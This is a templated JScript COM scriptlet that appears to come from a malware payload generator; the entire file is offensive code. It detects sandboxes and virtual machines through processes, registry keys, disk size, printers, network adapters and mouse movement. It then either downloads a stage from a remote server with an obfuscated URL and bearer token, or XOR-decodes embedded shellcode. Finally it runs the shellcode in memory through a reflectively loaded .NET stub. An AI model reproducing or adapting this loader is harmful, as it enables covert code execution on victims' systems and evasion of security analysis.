<?XML version="1.0"?>
<scriptlet>
<registration
    progid="{{ v.progid }}"
    classid="{{ '{' }}{{ v.clsid }}{{ '}' }}"
    description="{{ v.desc }}"
    remotable="true">
    <script language="JScript">
    <![CDATA[
    function {{ v.fn_build_str }}(a){var {{ v.jsc_lv_bs }}="";for(var {{ v.jsc_lv_bi }}=0;{{ v.jsc_lv_bi }}<a.length;{{ v.jsc_lv_bi }}++){{ v.jsc_lv_bs }}+=String.fromCharCode(a[{{ v.jsc_lv_bi }}]);return {{ v.jsc_lv_bs }};}

    function {{ v.fn_sandbox }}() {
        try {
            var {{ v.jsc_lv_wmi }}  = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
            var {{ v.jsc_lv_bad }}  = {{ v.fn_build_str }}([{{ v.jsc_vm_procs }}]).split("|");
            var {{ v.jsc_lv_pq }}   = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_proc_q }}]));
            for (var {{ v.jsc_lv_e }} = new Enumerator({{ v.jsc_lv_pq }}); !{{ v.jsc_lv_e }}.atEnd(); {{ v.jsc_lv_e }}.moveNext()) {
                var {{ v.jsc_lv_n }} = {{ v.jsc_lv_e }}.item().Name.toLowerCase();
                for (var {{ v.jsc_lv_sli }} = 0; {{ v.jsc_lv_sli }} < {{ v.jsc_lv_bad }}.length; {{ v.jsc_lv_sli }}++) { if ({{ v.jsc_lv_n }} === {{ v.jsc_lv_bad }}[{{ v.jsc_lv_sli }}]) return true; }
            }
            var {{ v.jsc_lv_mq }} = {{ v.jsc_lv_wmi }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_monitor_q }}]));
            for (var {{ v.jsc_lv_em }} = new Enumerator({{ v.jsc_lv_mq }}); !{{ v.jsc_lv_em }}.atEnd(); {{ v.jsc_lv_em }}.moveNext()) {
                var {{ v.jsc_lv_d }} = {{ v.jsc_lv_em }}.item();
                if ({{ v.jsc_lv_d }}.ScreenWidth && {{ v.jsc_lv_d }}.ScreenWidth < 800) return true;
            }
        } catch(e) {}
        try {
            var {{ v.jsc_lv_fso }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_fs_obj }}]));
            var {{ v.jsc_lv_drv }} = {{ v.jsc_lv_fso }}.GetDrive("C:");
            if ({{ v.jsc_lv_drv }}.TotalSize < 53687091200) return true;
        } catch(e) {}
        try {
            var {{ v.jsc_lv_sh }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
            var {{ v.jsc_lv_vmr }}=[{{ jsc_vmware_reg_enc }}],{{ v.jsc_lv_vmx }}={{ jsc_vmware_reg_xk }};
            for(var {{ v.jsc_lv_ri }}=0;{{ v.jsc_lv_ri }}<{{ v.jsc_lv_vmr }}.length;{{ v.jsc_lv_ri }}++){{ v.jsc_lv_vmr }}[{{ v.jsc_lv_ri }}]^={{ v.jsc_lv_vmx }};
            {{ v.jsc_lv_sh }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vmr }}));
            return true;
        } catch(e) {}
        try {
            var {{ v.jsc_lv_sh2 }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
            var {{ v.jsc_lv_vbr }}=[{{ jsc_vbox_reg_enc }}],{{ v.jsc_lv_vbx }}={{ jsc_vbox_reg_xk }};
            for(var {{ v.jsc_lv_ri2 }}=0;{{ v.jsc_lv_ri2 }}<{{ v.jsc_lv_vbr }}.length;{{ v.jsc_lv_ri2 }}++){{ v.jsc_lv_vbr }}[{{ v.jsc_lv_ri2 }}]^={{ v.jsc_lv_vbx }};
            {{ v.jsc_lv_sh2 }}.RegRead({{ v.fn_build_str }}({{ v.jsc_lv_vbr }}));
            return true;
        } catch(e) {}
        try {
            var {{ v.jsc_lv_wmi2 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
            var {{ v.jsc_lv_prq }} = {{ v.jsc_lv_wmi2 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_printer_q }}]));
            var {{ v.jsc_lv_pc }} = 0;
            for (var {{ v.jsc_lv_ep2 }} = new Enumerator({{ v.jsc_lv_prq }}); !{{ v.jsc_lv_ep2 }}.atEnd(); {{ v.jsc_lv_ep2 }}.moveNext()) {{ v.jsc_lv_pc }}++;
            if ({{ v.jsc_lv_pc }} === 0) return true;
        } catch(e) {}
        try {
            var {{ v.jsc_lv_wmi3 }} = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
            var {{ v.jsc_lv_naq }} = {{ v.jsc_lv_wmi3 }}.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_mac_q }}]));
            var {{ v.jsc_lv_nac }} = 0;
            for (var {{ v.jsc_lv_ena }} = new Enumerator({{ v.jsc_lv_naq }}); !{{ v.jsc_lv_ena }}.atEnd(); {{ v.jsc_lv_ena }}.moveNext()) {{ v.jsc_lv_nac }}++;
            if ({{ v.jsc_lv_nac }} < 2) return true;
        } catch(e) {}
        try {
            var {{ v.jsc_lv_envobj }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}])).Environment("Process");
            if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_vbox }}])) !== "") return true;
            if ({{ v.jsc_lv_envobj }}({{ v.fn_build_str }}([{{ v.jsc_env_sandboxie }}])) !== "") return true;
        } catch(e) {}
        return false;
    }

    function {{ v.fn_hex }}(h) {
        var {{ v.jsc_lv_ha }} = []; for (var {{ v.jsc_lv_hi }} = 0; {{ v.jsc_lv_hi }} < h.length; {{ v.jsc_lv_hi }} += 2)
            {{ v.jsc_lv_ha }}.push(parseInt(h.substr({{ v.jsc_lv_hi }}, 2), 16));
        return {{ v.jsc_lv_ha }};
    }

    function {{ v.fn_xor }}(d, k) {
        var {{ v.jsc_lv_xo }} = []; for (var {{ v.jsc_lv_xi2 }} = 0; {{ v.jsc_lv_xi2 }} < d.length; {{ v.jsc_lv_xi2 }}++)
            {{ v.jsc_lv_xo }}.push(d[{{ v.jsc_lv_xi2 }}] ^ k[{{ v.jsc_lv_xi2 }} % k.length]);
        return {{ v.jsc_lv_xo }};
    }

    function {{ v.fn_run }}() {
        if ({{ v.fn_sandbox }}()) return;
        var {{ v.jsc_lv_cx }} = -999, {{ v.jsc_lv_cy }} = -999;
        try {
            var {{ v.jsc_lv_a1 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w1 }}={{ v.jsc_lv_a1 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
            if({{ v.jsc_lv_w1 }}){var {{ v.jsc_lv_t1 }}={{ v.jsc_lv_w1 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
            if({{ v.jsc_lv_t1 }}){var {{ v.jsc_lv_pp1 }}={{ v.jsc_lv_t1 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
            if({{ v.jsc_lv_pp1 }}){var {{ v.jsc_lv_ps1 }}={{ v.jsc_lv_pp1 }}.GetValue(null,null);if({{ v.jsc_lv_ps1 }}){ {{ v.jsc_lv_cx }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps1 }},null);{{ v.jsc_lv_cy }}={{ v.jsc_lv_ps1 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps1 }},null);}}}}
        } catch(_e) {}
        try { WScript.Sleep(2000 + Math.floor(Math.random() * 3000)); } catch(_es) {
            var {{ v.jsc_lv_ts }} = new Date().getTime(); while(new Date().getTime() - {{ v.jsc_lv_ts }} < 2000) {}
        }
        if ({{ v.jsc_lv_cx }} !== -999) {
            try {
                var {{ v.jsc_lv_a2 }}=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),{{ v.jsc_lv_w2 }}={{ v.jsc_lv_a2 }}.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
                if({{ v.jsc_lv_w2 }}){var {{ v.jsc_lv_t2 }}={{ v.jsc_lv_w2 }}.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
                if({{ v.jsc_lv_t2 }}){var {{ v.jsc_lv_pp2 }}={{ v.jsc_lv_t2 }}.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
                if({{ v.jsc_lv_pp2 }}){var {{ v.jsc_lv_ps2 }}={{ v.jsc_lv_pp2 }}.GetValue(null,null);if({{ v.jsc_lv_ps2 }}){var {{ v.jsc_lv_cx2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue({{ v.jsc_lv_ps2 }},null);var {{ v.jsc_lv_cy2 }}={{ v.jsc_lv_ps2 }}.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue({{ v.jsc_lv_ps2 }},null);if({{ v.jsc_lv_cx }}==={{ v.jsc_lv_cx2 }}&&{{ v.jsc_lv_cy }}==={{ v.jsc_lv_cy2 }})return;}}}}
            } catch(_e2) {}
        }
        {%- if is_staged %}
        var {{ sg.sg_lv_url }}=[{{ staged_url_csv }}],{{ sg.sg_lv_jwt }}=[{{ staged_jwt_csv }}],{{ sg.sg_lv_ua }}=[{{ staged_ua_csv }}];
        for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_url }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_url }}[{{ sg.sg_lv_i }}]^={{ staged_url_xk }};
        for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_jwt }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}]^={{ staged_jwt_xk }};
        for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_ua }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_ua }}[{{ sg.sg_lv_i }}]^={{ staged_ua_xk }};
        var {{ sg.sg_lv_req }};
        try { {{ sg.sg_lv_req }} = new ActiveXObject({{ v.fn_build_str }}([77,83,88,77,76,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,54,46,48])); }
        catch(_q1) { try { {{ sg.sg_lv_req }} = new ActiveXObject({{ v.fn_build_str }}([77,83,88,77,76,50,46,88,77,76,72,84,84,80])); } catch(_q2) { return; } }
        {{ sg.sg_lv_req }}.open({{ v.fn_build_str }}([71,69,84]), {{ v.fn_build_str }}({{ sg.sg_lv_url }}), false);
        {{ sg.sg_lv_req }}.setRequestHeader({{ v.fn_build_str }}([65,117,116,104,111,114,105,122,97,116,105,111,110]), {{ v.fn_build_str }}([66,101,97,114,101,114,32]) + {{ v.fn_build_str }}({{ sg.sg_lv_jwt }}));
        {{ sg.sg_lv_req }}.setRequestHeader({{ v.fn_build_str }}([85,115,101,114,45,65,103,101,110,116]), {{ v.fn_build_str }}({{ sg.sg_lv_ua }}));
        try { {{ sg.sg_lv_req }}.send(); } catch(_qs) { return; }
        if ({{ sg.sg_lv_req }}.status !== 200) { return; }
        var {{ v.jsc_lv_sc }} = new VBArray({{ sg.sg_lv_req }}.responseBody).toArray();
        for(var {{ sg.sg_lv_i }}=0;{{ sg.sg_lv_i }}<{{ sg.sg_lv_jwt }}.length;{{ sg.sg_lv_i }}++){{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}]=0;
        {%- else %}
        var {{ v.jsc_lv_k }} = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
        for (var {{ v.jsc_lv_ki }} = 0; {{ v.jsc_lv_ki }} < {{ v.jsc_lv_k }}.length; {{ v.jsc_lv_ki }}++) {{ v.jsc_lv_k }}[{{ v.jsc_lv_ki }}] ^= {{ key_tweak }};
        var {{ v.jsc_lv_sc }} = {{ v.fn_xor }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), {{ v.jsc_lv_k }});
        {%- endif %}
        var {{ v.jsc_lv_loader }} = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var {{ v.jsc_lv_asm }} = {{ v.jsc_lv_loader }}.Load({{ v.fn_hex }}("{{ dotnet_stub_hex }}"));
        {{ v.jsc_lv_asm }}.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}])).GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}])).Invoke(null, [{{ v.jsc_lv_sc }}]);
    }

    {{ v.fn_run }}();
    ]]>
    </script>
</registration>
</scriptlet>
